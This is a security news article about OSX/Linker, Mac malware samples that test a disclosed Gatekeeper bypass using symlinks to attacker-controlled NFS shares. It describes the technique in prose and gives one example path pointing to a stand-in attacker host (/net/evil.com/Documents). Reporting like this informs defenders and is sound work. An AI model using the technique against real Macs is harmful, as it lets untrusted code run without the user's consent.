OSX/Linker Malware Leverages Known Gatekeeper Vulnerability
CYBER NEWS

OSX/Linker Malware Leverages Known Gatekeeper Vulnerability

1 Star2 Stars3 Stars4 Stars5 Stars (No Ratings Yet)
Loading...

New Mac malware is being developed targeting a recently discovered macOS Gatekeeper security flaw. The malware in question is known as OSX/Linker, and it has been analyzed by Intego security researcher Joshua Long.




OSX/Linker Malware: what we know so far

The new malware leverages

By putting together two legitimate features of macOS, it is possible to deceive the Gatekeeper and its ?intended behavior?.
a known Gatekeeper vulnerability which was disclosed in May by Filippo Cavallarin. The bug could allow a malicious binary downloaded from the internet to bypass Gatekeeper’s scanning process. “On MacOS X version <= 10.14.5 (at time of writing) it is possible to easily bypass Gatekeeper in order to execute untrusted code without any warning or user's explicit permission,” the researcher wrote in May upon his discovery.

It’s noteworthy that it’s in Gatekeeper’s design to accept both external drives and network shares as safe location, allowing apps that they contain to run flawlessly. However, by putting together two legitimate features of macOS, it is possible to deceive the Gatekeeper and its “intended behavior”.

How would an attack based on the vulnerability work? An attacker could craft a zip file with a symbolic link to an automount hacker-controlled endpoint (ex Documents -> /net/evil.com/Documents) and could send it to a targeted system. The user would download the malicious archive, and would extract the malicious file without suspecting anything.

Related:
If vulnerabilities have been exposed in any operating system, the system becomes susceptible to malware attacks. macOS is not an exception.
5 macOS Vulnerabilities that Shouldn’t Be Overlooked

This involved putting a symlink in an archive file and linking it back to a malicious Network File System server. The researcher discovered that Gatekeeper wouldn’t scan these specific files, allowing users to execute the symlinks. In case of malicious symlinks, attackers could run malicious code on vulnerable systems.

In the beginning of June, Intego’s malware research team discovered the first known (ab)use of Cavallarin’s vulnerability, which appears to have been used as a test in preparation for distributing malware.

Although Cavallarin’s vulnerability disclosure specifies a .zip compressed archive, the samples analyzed by Intego were actually disk image files. It seems that malware makers were experimenting to see whether Cavallarin’s vulnerability would work with disk images, too.

The security company observed four samples that were uploaded to VirusTotal on June 6, seemingly within hours of the creation of each disk image. All of them linked to one particular application on an Internet-accessible NFS server.

So far, the researchers’ theory is that the malware maker was “merely conducting some detection testing reconnaissance“. Nonetheless, this is another reminder that malware developers are actively experimenting with new methods to bypass Apple’s built-in protection mechanisms.

Milena Dimitrova

An inspired writer and content manager who has been with SensorsTechForum for 4 years. Enjoys ‘Mr. Robot’ and fears ‘1984’. Focused on user privacy and malware development, she strongly believes in a world where cybersecurity plays a central role. If common sense makes no sense, she will be there to take notes. Those notes may later turn into articles!

More Posts

Leave a Comment

Your email address will not be published. Required fields are marked *

Time limit is exhausted. Please reload CAPTCHA.

Share on Facebook Share
Loading...
Share on Twitter Tweet
Loading...
Share on Google Plus Share
Loading...
Share on Linkedin Share
Loading...
Share on Digg Share
Share on Reddit Share
Loading...
Share on Stumbleupon Share
Loading...